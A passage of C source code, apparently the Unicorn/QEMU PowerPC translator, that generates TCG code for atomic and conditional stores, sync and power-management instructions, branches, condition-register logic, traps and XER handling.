tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, s, t, t2, src, t); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, s2, t, t2, src, t2); tcg_gen_qemu_st_tl(tcg_ctx, s, EA, ctx->mem_idx, memop); tcg_gen_qemu_st_tl(tcg_ctx, s2, ea_plus_s, ctx->mem_idx, memop); tcg_temp_free(tcg_ctx, ea_plus_s); tcg_temp_free(tcg_ctx, s2); tcg_temp_free(tcg_ctx, s); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t); } break; default: /* invoke data storage error handler */ gen_exception_err(ctx, POWERPC_EXCP_DSI, POWERPC_EXCP_INVAL); } tcg_temp_free(tcg_ctx, discard); tcg_temp_free(tcg_ctx, EA); } static void gen_stwat(DisasContext *ctx) { gen_st_atomic(ctx, DEF_MEMOP(MO_UL)); } #ifdef TARGET_PPC64 static void gen_stdat(DisasContext *ctx) { gen_st_atomic(ctx, DEF_MEMOP(MO_Q)); } #endif static void gen_conditional_store(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); int reg = rS(ctx->opcode); gen_set_access_type(ctx, ACCESS_RES); gen_addr_reg_index(ctx, t0); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, cpu_reserve, l1); tcg_temp_free(tcg_ctx, t0); t0 = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, t0, cpu_reserve, cpu_reserve_val, cpu_gpr[reg], ctx->mem_idx, DEF_MEMOP(memop) | MO_ALIGN); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t0, t0, cpu_reserve_val); tcg_gen_shli_tl(tcg_ctx, t0, t0, CRF_EQ_BIT); tcg_gen_or_tl(tcg_ctx, t0, t0, cpu_so); 
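    /*
     * CR0 = 0b00 || EQ || SO: t0 now holds CRF_EQ when the cmpxchg saw
     * the reserved value (i.e. the conditional store was performed),
     * OR-ed with the summary-overflow bit.
     */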
tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); /* * Address mismatch implies failure. But we still need to provide * the memory barrier semantics of the instruction. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); gen_set_label(tcg_ctx, l2); tcg_gen_movi_tl(tcg_ctx, cpu_reserve, -1); } #define STCX(name, memop) \ static void gen_##name(DisasContext *ctx) \ { \ gen_conditional_store(ctx, memop); \ } STCX(stbcx_, DEF_MEMOP(MO_UB)) STCX(sthcx_, DEF_MEMOP(MO_UW)) STCX(stwcx_, DEF_MEMOP(MO_UL)) #if defined(TARGET_PPC64) /* ldarx */ LARX(ldarx, DEF_MEMOP(MO_Q)) /* stdcx. */ STCX(stdcx_, DEF_MEMOP(MO_Q)) /* lqarx */ static void gen_lqarx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv EA, hi, lo; if (unlikely((rd & 1) || (rd == rA(ctx->opcode)) || (rd == rB(ctx->opcode)))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_RES); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); /* Note that the low part is always in RD+1, even in LE mode. */ lo = cpu_gpr[rd + 1]; hi = cpu_gpr[rd]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_ATOMIC128) { TCGv_i32 oi = tcg_temp_new_i32(tcg_ctx); if (ctx->le_mode) { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_LEQ | MO_ALIGN_16, ctx->mem_idx)); gen_helper_lq_le_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } else { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_BEQ | MO_ALIGN_16, ctx->mem_idx)); gen_helper_lq_be_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } tcg_temp_free_i32(tcg_ctx, oi); tcg_gen_ld_i64(tcg_ctx, hi, tcg_ctx->cpu_env, offsetof(CPUPPCState, retxh)); } else { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, EA); return; } } else if (ctx->le_mode) { tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_LEQ | MO_ALIGN_16); tcg_gen_mov_tl(tcg_ctx, cpu_reserve, EA); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_LEQ); } else { tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_BEQ | MO_ALIGN_16); tcg_gen_mov_tl(tcg_ctx, cpu_reserve, EA); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); tcg_gen_st_tl(tcg_ctx, hi, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_val)); tcg_gen_st_tl(tcg_ctx, lo, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_val2)); } /* stqcx. */ static void gen_stqcx_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs = rS(ctx->opcode); TCGv EA, hi, lo; if (unlikely(rs & 1)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_RES); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); /* Note that the low part is always in RS+1, even in LE mode. */ lo = cpu_gpr[rs + 1]; hi = cpu_gpr[rs]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_CMPXCHG128) { TCGv_i32 oi = tcg_const_i32(tcg_ctx, DEF_MEMOP(MO_Q) | MO_ALIGN_16); if (ctx->le_mode) { gen_helper_stqcx_le_parallel(tcg_ctx, cpu_crf[0], tcg_ctx->cpu_env, EA, lo, hi, oi); } else { gen_helper_stqcx_be_parallel(tcg_ctx, cpu_crf[0], tcg_ctx->cpu_env, EA, lo, hi, oi); } tcg_temp_free_i32(tcg_ctx, oi); } else { /* Restart with exclusive lock. 
             */
            gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env);
            ctx->base.is_jmp = DISAS_NORETURN;
        }
        tcg_temp_free(tcg_ctx, EA);
    } else {
        TCGLabel *lab_fail = gen_new_label(tcg_ctx);
        TCGLabel *lab_over = gen_new_label(tcg_ctx);
        TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx);
        TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx);

        tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, EA, cpu_reserve, lab_fail);
        tcg_temp_free(tcg_ctx, EA);

        gen_qemu_ld64_i64(ctx, t0, cpu_reserve);
        tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env,
                       (ctx->le_mode
                        ? offsetof(CPUPPCState, reserve_val2)
                        : offsetof(CPUPPCState, reserve_val)));
        tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, t0, t1, lab_fail);

        tcg_gen_addi_i64(tcg_ctx, t0, cpu_reserve, 8);
        gen_qemu_ld64_i64(ctx, t0, t0);
        tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env,
                       (ctx->le_mode
                        ? offsetof(CPUPPCState, reserve_val)
                        : offsetof(CPUPPCState, reserve_val2)));
        tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, t0, t1, lab_fail);

        /* Success */
        gen_qemu_st64_i64(ctx, ctx->le_mode ? lo : hi, cpu_reserve);
        tcg_gen_addi_i64(tcg_ctx, t0, cpu_reserve, 8);
        gen_qemu_st64_i64(ctx, ctx->le_mode ? hi : lo, t0);

        tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so);
        tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], CRF_EQ);
        tcg_gen_br(tcg_ctx, lab_over);

        gen_set_label(tcg_ctx, lab_fail);
        tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so);

        gen_set_label(tcg_ctx, lab_over);
        tcg_gen_movi_tl(tcg_ctx, cpu_reserve, -1);
        tcg_temp_free_i64(tcg_ctx, t0);
        tcg_temp_free_i64(tcg_ctx, t1);
    }
}
#endif /* defined(TARGET_PPC64) */

/* sync */
static void gen_sync(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    uint32_t l = (ctx->opcode >> 21) & 3;

    /*
     * We may need to check for a pending TLB flush.
     *
     * We do this on ptesync (l == 2) on ppc64 and any sync on ppc32.
     *
     * Additionally, this can only happen in kernel mode however so
     * check MSR_PR as well.
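     * (l is the instruction's L field, extracted above as bits 21-22
     * of the opcode; l == 2 is the ptesync encoding.)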
*/ if (((l == 2) || !(ctx->insns_flags & PPC_64B)) && !ctx->pr) { gen_check_tlb_flush(ctx, true); } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); } /* wait */ static void gen_wait(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, 1); #ifdef _MSC_VER tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, 0 - offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #else tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, -offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #endif tcg_temp_free_i32(tcg_ctx, t0); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } #if defined(TARGET_PPC64) static void gen_doze(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_DOZE); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_nap(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_NAP); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_stop(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_STOP); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_sleep(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_SLEEP); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_rvwinkle(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_RVWINKLE); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } #endif /* #if defined(TARGET_PPC64) */ static inline void gen_update_cfar(DisasContext *ctx, target_ulong nip) { #if defined(TARGET_PPC64) if (ctx->has_cfar) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, cpu_cfar, nip); } #endif } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_lookup_and_goto_ptr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sse = ctx->singlestep_enabled; if (unlikely(sse)) { if (sse & GDBSTUB_SINGLE_STEP) { gen_debug_exception(ctx); } else if (sse & (CPU_SINGLE_STEP | CPU_BRANCH_STEP)) { uint32_t excp = gen_prep_dbgex(ctx); gen_exception(ctx, excp); } tcg_gen_exit_tb(tcg_ctx, NULL, 0); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } /*** Branch ***/ static void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { dest = (uint32_t) dest; } if (use_goto_tb(ctx, dest)) { tcg_gen_goto_tb(tcg_ctx, n); 
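        /*
         * tcg_gen_goto_tb emits a patchable direct jump; the matching
         * exit_tb(tb, n) below returns (tb | n) to the engine so that
         * jump slot n of this TB can later be chained straight to the
         * translated target.
         */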
tcg_gen_movi_tl(tcg_ctx, cpu_nip, dest & ~3); tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { tcg_gen_movi_tl(tcg_ctx, cpu_nip, dest & ~3); gen_lookup_and_goto_ptr(ctx); } } static inline void gen_setlr(DisasContext *ctx, target_ulong nip) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { nip = (uint32_t)nip; } tcg_gen_movi_tl(tcg_ctx, cpu_lr, nip); } /* b ba bl bla */ static void gen_b(DisasContext *ctx) { target_ulong li, target; ctx->exception = POWERPC_EXCP_BRANCH; /* sign extend LI */ li = LI(ctx->opcode); li = (li ^ 0x02000000) - 0x02000000; if (likely(AA(ctx->opcode) == 0)) { target = ctx->base.pc_next + li - 4; } else { target = li; } if (LK(ctx->opcode)) { gen_setlr(ctx, ctx->base.pc_next); } gen_update_cfar(ctx, ctx->base.pc_next - 4); gen_goto_tb(ctx, 0, target); } #define BCOND_IM 0 #define BCOND_LR 1 #define BCOND_CTR 2 #define BCOND_TAR 3 static void gen_bcond(DisasContext *ctx, int type) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t bo = BO(ctx->opcode); TCGLabel *l1; TCGv target; ctx->exception = POWERPC_EXCP_BRANCH; if (type == BCOND_LR || type == BCOND_CTR || type == BCOND_TAR) { target = tcg_temp_local_new(tcg_ctx); if (type == BCOND_CTR) { tcg_gen_mov_tl(tcg_ctx, target, cpu_ctr); } else if (type == BCOND_TAR) { gen_load_spr(tcg_ctx, target, SPR_TAR); } else { tcg_gen_mov_tl(tcg_ctx, target, cpu_lr); } } else { target = NULL; } if (LK(ctx->opcode)) { gen_setlr(ctx, ctx->base.pc_next); } l1 = gen_new_label(tcg_ctx); if ((bo & 0x4) == 0) { /* Decrement and test CTR */ TCGv temp = tcg_temp_new(tcg_ctx); if (type == BCOND_CTR) { /* * All ISAs up to v3 describe this form of bcctr as invalid but * some processors, ie. 64-bit server processors compliant with * arch 2.x, do implement a "test and decrement" logic instead, * as described in their respective UMs. This logic involves CTR * to act as both the branch target and a counter, which makes * it basically useless and thus never used in real code. * * This form was hence chosen to trigger extra micro-architectural * side-effect on real HW needed for the Spectre v2 workaround. * It is up to guests that implement such workaround, ie. linux, to * use this form in a way it just triggers the side-effect without * doing anything else harmful. 
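             * (That is the (bo & 0x4) == 0 case handled below: BO bit 2
             * clear requests "decrement CTR, then test".)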
*/ if (unlikely(!is_book3s_arch2x(ctx))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, target); return; } if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, temp, cpu_ctr); } else { tcg_gen_mov_tl(tcg_ctx, temp, cpu_ctr); } if (bo & 0x2) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, temp, 0, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, temp, 0, l1); } tcg_gen_subi_tl(tcg_ctx, cpu_ctr, cpu_ctr, 1); } else { tcg_gen_subi_tl(tcg_ctx, cpu_ctr, cpu_ctr, 1); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, temp, cpu_ctr); } else { tcg_gen_mov_tl(tcg_ctx, temp, cpu_ctr); } if (bo & 0x2) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, temp, 0, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, temp, 0, l1); } } tcg_temp_free(tcg_ctx, temp); } if ((bo & 0x10) == 0) { /* Test CR */ uint32_t bi = BI(ctx->opcode); uint32_t mask = 0x08 >> (bi & 0x03); TCGv_i32 temp = tcg_temp_new_i32(tcg_ctx); if (bo & 0x8) { tcg_gen_andi_i32(tcg_ctx, temp, cpu_crf[bi >> 2], mask); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, temp, 0, l1); } else { tcg_gen_andi_i32(tcg_ctx, temp, cpu_crf[bi >> 2], mask); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, temp, 0, l1); } tcg_temp_free_i32(tcg_ctx, temp); } gen_update_cfar(ctx, ctx->base.pc_next - 4); if (type == BCOND_IM) { target_ulong li = (target_long)((int16_t)(BD(ctx->opcode))); if (likely(AA(ctx->opcode) == 0)) { gen_goto_tb(ctx, 0, ctx->base.pc_next + li - 4); } else { gen_goto_tb(ctx, 0, li); } } else { if (NARROW_MODE(ctx)) { tcg_gen_andi_tl(tcg_ctx, cpu_nip, target, (uint32_t)~3); } else { tcg_gen_andi_tl(tcg_ctx, cpu_nip, target, ~3); } gen_lookup_and_goto_ptr(ctx); tcg_temp_free(tcg_ctx, target); } if ((bo & 0x14) != 0x14) { /* fallthrough case */ gen_set_label(tcg_ctx, l1); gen_goto_tb(ctx, 1, ctx->base.pc_next); } } static void gen_bc(DisasContext *ctx) { gen_bcond(ctx, BCOND_IM); } static void gen_bcctr(DisasContext *ctx) { gen_bcond(ctx, BCOND_CTR); } static void gen_bclr(DisasContext *ctx) { gen_bcond(ctx, BCOND_LR); } static void gen_bctar(DisasContext *ctx) { gen_bcond(ctx, BCOND_TAR); } /*** Condition register logical ***/ #define GEN_CRLOGIC(name, tcg_op, opc) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ uint8_t bitmask; \ int sh; \ TCGv_i32 t0, t1; \ sh = (crbD(ctx->opcode) & 0x03) - (crbA(ctx->opcode) & 0x03); \ t0 = tcg_temp_new_i32(tcg_ctx); \ if (sh > 0) \ tcg_gen_shri_i32(tcg_ctx, t0, cpu_crf[crbA(ctx->opcode) >> 2], sh); \ else if (sh < 0) \ tcg_gen_shli_i32(tcg_ctx, t0, cpu_crf[crbA(ctx->opcode) >> 2], -sh); \ else \ tcg_gen_mov_i32(tcg_ctx, t0, cpu_crf[crbA(ctx->opcode) >> 2]); \ t1 = tcg_temp_new_i32(tcg_ctx); \ sh = (crbD(ctx->opcode) & 0x03) - (crbB(ctx->opcode) & 0x03); \ if (sh > 0) \ tcg_gen_shri_i32(tcg_ctx, t1, cpu_crf[crbB(ctx->opcode) >> 2], sh); \ else if (sh < 0) \ tcg_gen_shli_i32(tcg_ctx, t1, cpu_crf[crbB(ctx->opcode) >> 2], -sh); \ else \ tcg_gen_mov_i32(tcg_ctx, t1, cpu_crf[crbB(ctx->opcode) >> 2]); \ tcg_op(tcg_ctx, t0, t0, t1); \ bitmask = 0x08 >> (crbD(ctx->opcode) & 0x03); \ tcg_gen_andi_i32(tcg_ctx, t0, t0, bitmask); \ tcg_gen_andi_i32(tcg_ctx, t1, cpu_crf[crbD(ctx->opcode) >> 2], ~bitmask); \ tcg_gen_or_i32(tcg_ctx, cpu_crf[crbD(ctx->opcode) >> 2], t0, t1); \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } /* crand */ GEN_CRLOGIC(crand, tcg_gen_and_i32, 0x08); /* crandc */ GEN_CRLOGIC(crandc, tcg_gen_andc_i32, 0x04); /* creqv */ GEN_CRLOGIC(creqv, tcg_gen_eqv_i32, 0x09); /* crnand */ 
GEN_CRLOGIC(crnand, tcg_gen_nand_i32, 0x07); /* crnor */ GEN_CRLOGIC(crnor, tcg_gen_nor_i32, 0x01); /* cror */ GEN_CRLOGIC(cror, tcg_gen_or_i32, 0x0E); /* crorc */ GEN_CRLOGIC(crorc, tcg_gen_orc_i32, 0x0D); /* crxor */ GEN_CRLOGIC(crxor, tcg_gen_xor_i32, 0x06); /* mcrf */ static void gen_mcrf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfS(ctx->opcode)]); } /*** System linkage ***/ /* rfi (supervisor only) */ static void gen_rfi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * This instruction doesn't exist anymore on 64-bit server * processors compliant with arch 2.x */ if (is_book3s_arch2x(ctx)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } /* Restore CPU state */ CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_update_cfar(ctx, ctx->base.pc_next - 4); gen_helper_rfi(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } #if defined(TARGET_PPC64) static void gen_rfid(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Restore CPU state */ CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_update_cfar(ctx, ctx->base.pc_next - 4); gen_helper_rfid(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } static void gen_hrfid(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Restore CPU state */ CHK_HV; gen_helper_hrfid(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } #endif /* sc */ #define POWERPC_SYSCALL POWERPC_EXCP_SYSCALL static void gen_sc(DisasContext *ctx) { uint32_t lev; lev = (ctx->opcode >> 5) & 0x7F; gen_exception_err(ctx, POWERPC_SYSCALL, lev); } /*** Trap ***/ /* Check for unconditional traps (always or never) */ static bool check_unconditional_trap(DisasContext *ctx) { /* Trap never */ if (TO(ctx->opcode) == 0) { return true; } /* Trap always */ if (TO(ctx->opcode) == 31) { gen_exception_err(ctx, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_TRAP); return true; } return false; } /* tw */ static void gen_tw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_tw(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } /* twi */ static void gen_twi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); t1 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_tw(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #if defined(TARGET_PPC64) /* td */ static void gen_td(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_td(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } /* tdi */ static void gen_tdi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); t1 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_td(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #endif /*** Processor control ***/ static void 
gen_read_xer(DisasContext *ctx, TCGv dst) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, dst, cpu_xer); tcg_gen_shli_tl(tcg_ctx, t0, cpu_so, XER_SO); tcg_gen_shli_tl(tcg_ctx, t1, cpu_ov, XER_OV); tcg_gen_shli_tl(tcg_ctx, t2, cpu_ca, XER_CA); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_or_tl(tcg_ctx, dst, dst, t2); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); if (is_isa300(ctx)) { tcg_gen_shli_tl(tcg_ctx, t0, cpu_ov32, XER_OV32); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_gen_shli_tl(tcg_ctx, t0, cpu_ca32, XER_CA32); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_write_xer(TCGContext *tcg_ctx, TCGv src) { /* Write all flags, while reading back check for isa300 */ tcg_gen_andi_tl(tcg_ctx, cpu_xer, src, ~((1u << XER_SO) | (1u << XER_OV) | (1u << XER_OV32) | (1u << XER_CA) | (1u << XER_CA32))); tcg_gen_extract_tl(tcg_ctx, cpu_ov32, src, XER_OV32, 1); tcg_gen_extract_tl(tcg_ctx, cpu_ca32, src, XER_CA32, 1); tcg_gen_extract_tl(tcg_ctx, cpu_so, src, XER_SO, 1); tcg_gen_extract_tl(tcg_ctx, cpu_ov, src, XER_OV, 1); tcg_gen_extract_tl(tcg_ctx, cpu_ca, src, XER_CA, 1); } /* mcrxr */ static void gen_mcrxr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 dst = cpu_crf[crfD(ctx->opcode)]; tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_so); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_ov); tcg_gen_trunc_tl_i32(tcg_ctx, dst, cpu_ca); tcg_gen_shli_i32(tcg_ctx, t0, t0, 3); tcg_gen_shli_i32(tcg_ctx, t1, t1, 2); tcg_gen_shli_i32(tcg_ctx, dst, dst, 1); tcg_gen_or_i32(tcg_ctx, dst, dst, t0); tcg_gen_or_i32(tcg_ctx, dst, dst, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 0); tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); } #ifdef TARGET_PPC64 /* mcrxrx */ static void gen_mcrxrx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv_i32 dst = cpu_crf[crfD(ctx->opcode)]; /* copy OV and OV32 */ tcg_gen_shli_tl(tcg_ctx, t0, cpu_ov, 1); tcg_gen_or_tl(tcg_ctx, t0, t0, cpu_ov32); tcg_gen_shli_tl(tcg_ctx, t0, t0, 2); /* copy CA and CA32 */ tcg_gen_shli_tl(tcg_ctx, t1, cpu_ca, 1); tcg_gen_or_tl(tcg_ctx, t1, t1, cpu_ca32); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_trunc_tl_i32(tcg_ctx, dst, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #endif /* mfcr mfocrf */ static void gen_mfcr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t crm, crn; if (likely(ctx->opcode & 0x00100000)) { crm = CRM(ctx->opcode); if (likely(crm && ((crm & (crm - 1)) == 0))) { crn = ctz32(crm); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_crf[7 - crn]); tcg_gen_shli_tl(tcg_ctx, 